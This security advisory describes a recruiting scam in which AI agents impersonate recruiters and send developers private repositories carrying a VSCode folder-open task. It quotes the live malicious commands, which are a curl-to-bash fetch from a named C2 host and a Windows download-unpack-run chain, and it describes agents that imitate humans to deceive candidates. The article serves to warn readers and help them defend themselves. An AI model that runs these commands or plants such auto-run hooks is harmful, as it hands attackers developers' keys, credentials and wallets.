# AI Agents in Recruiting Scams: How They Infect via Private Repositories
Scammers have started using AI agents to automate attacks on developers via platforms like Habr Career. Instead of manual messaging, thousands of candidates now receive personalized job offers with test tasks containing hidden malicious code. The main vector is private GitHub repositories with auto-launching tasks in VSCode.
How the New Attack Scheme Works
The attacker registers an account on a recruiting platform and sets up an AI agent that parses developer profiles. Based on the stack (e.g., React + Node.js + Web3), it generates a convincing job description and conducts a dialogue mimicking a live HR. The agent avoids instant replies, makes "human-like" typos, and communicates only during business hours—all to build trust.
After the candidate agrees to the test task, they're added to a private repository on GitHub. This is key: public repositories quickly get flagged by security scanners, while private ones stay under the radar until cloned.
Hidden Payload in .vscode/
Inside the repository is a standard fullstack structure: React frontend, Express backend, PostgreSQL database, Firebase authentication, Stripe integration. The code looks legit even on a superficial review. However, the malicious component is hidden in the .vscode/ directory.
The tasks.json file contains a task with the parameter:
"runOn": "folderOpen"
This makes VSCode automatically run the command when opening the project folder. A notification pops up at the bottom of the interface, but most developers ignore it since such tasks are common for building projects.
Commands vary by OS:
Linux / macOS:
curl -fsSL -A 101 https://ping-i2eo.onrender.com/nvs | bash
Windows:
curl -sk -A 100 -o %TEMP%\i.ini https://ping-i2eo.onrender.com/nvs
.\ .vscode\snippets\argv.exe x -ppppppp %TEMP%\i.ini -o%TEMP%
wscript.exe %TEMP%\vs9extensions\update.vbs
Components of the Malicious Infrastructure
The attack leverages several technical elements:
- C2 server:
ping-i2eo.onrender.comhosted on free Render.com. The/nvsendpoint delivers a dynamic shell script. User-Agent (100,101,102) identifies the victim's OS. - Binary
argv.exe: PE32 file (579 KB) in.vscode/snippets/, used to unpack an encrypted payload on Windows. - Obfuscated JS:
.vscode/lockfile (753 KB) with one-line JavaScript, likely for persistence or data theft in Unix environments. - Fake credentials:
server/config/default.jsoncontains plaintext real API keys (Cloudflare, S3/R2, email) to lend legitimacy to the project.
Attack Goals and Consequences
The exact payload is unknown since it's dynamically loaded from the C2 server. However, typical targets include:
- Stealing SSH keys from
~/.ssh/ - Extracting
.envfiles and tokens from other projects - Hijacking browser cookies and saved passwords
- Installing a cryptominer
- Planting a backdoor or reverse shell for persistent access
Web3 developers are especially vulnerable: their machines often hold seed phrases, private keys, and wallets providing direct access to crypto assets.
Why the Attack Failed This Time
Two factors prevented infection:
- VSCode setting
task.allowAutomaticTasks: off— completely blocks automatic workspace task execution without explicit confirmation. - Opening the repository in WSL terminal, not the GUI VSCode version. The
runOn: folderOpenparameter only triggers when opening the folder via the desktop app.
Red Flags When Dealing with Recruiters
Watch for these warning signs:
- AI simulating a human: deliberate typos, replies only during business hours, dodging specifics. Requests for project details yield vague, templated "startup slop."
- Overly precise job personalization matching your exact stack, especially from a low-activity account.
- Private repository for the test task without code preview option.
- Presence of
.vscode/tasks.jsonwith"runOn": "folderOpen"— legitimate test tasks don't require auto-launching scripts.
Key Takeaways
- Disable automatic task execution in VSCode: Go to Settings → search for
task.allowAutomaticTasks→ set tooff. - Always inspect repository contents in the GitHub web interface before cloning, especially
.vscode/files. - Don't blindly trust private repositories — they're commonly used to evade malware detection systems.
- Web3 developers are prime targets: Isolate wallets and keys from your main workspace.
- AI agents slash scam costs: A single system can process thousands of profiles, enabling mass-scale yet highly personalized attacks.
— Editorial Team
No comments yet.